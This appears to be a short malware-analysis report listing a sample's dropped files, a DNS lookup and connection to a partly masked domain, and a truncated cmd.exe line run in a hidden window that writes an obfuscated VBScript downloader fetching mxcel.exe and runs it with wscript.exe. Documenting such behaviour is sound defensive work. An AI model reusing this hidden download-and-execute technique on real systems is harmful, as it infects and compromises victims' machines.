Technical Information
- '%TEMP%\odk.exe'
- %TEMP%\e4v.vbe
- %TEMP%\odk.exe
- %TEMP%\e4v.vbe
- 'im######exports-goods.com':80
- DNS ASK im######exports-goods.com
- '<SYSTEM32>\wscript.exe' "%TEMP%\E4v.vBe"
- '<SYSTEM32>\cmd.exe' /C Cd %TemP% & @EChO U6v = "http://im######exports-goods.com/mxcel.exe">>E4v.vBe &@EChO P0h = J7h("ncjMdwd")>>E4v.vBe &@EChO Set P3e = CreateObject(J7h("lrwlkQMwlkgss...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C Cd %TemP% & @EChO U6v = "http://im######exports-goods.com/mxcel.exe">>E4v.vBe &@EChO P0h = J7h("ncjMdwd")>>E4v.vBe &@EChO Set P3e = CreateObject(J7h("lrwlkQMwlkgss...
- '<SYSTEM32>\timeout.exe' 12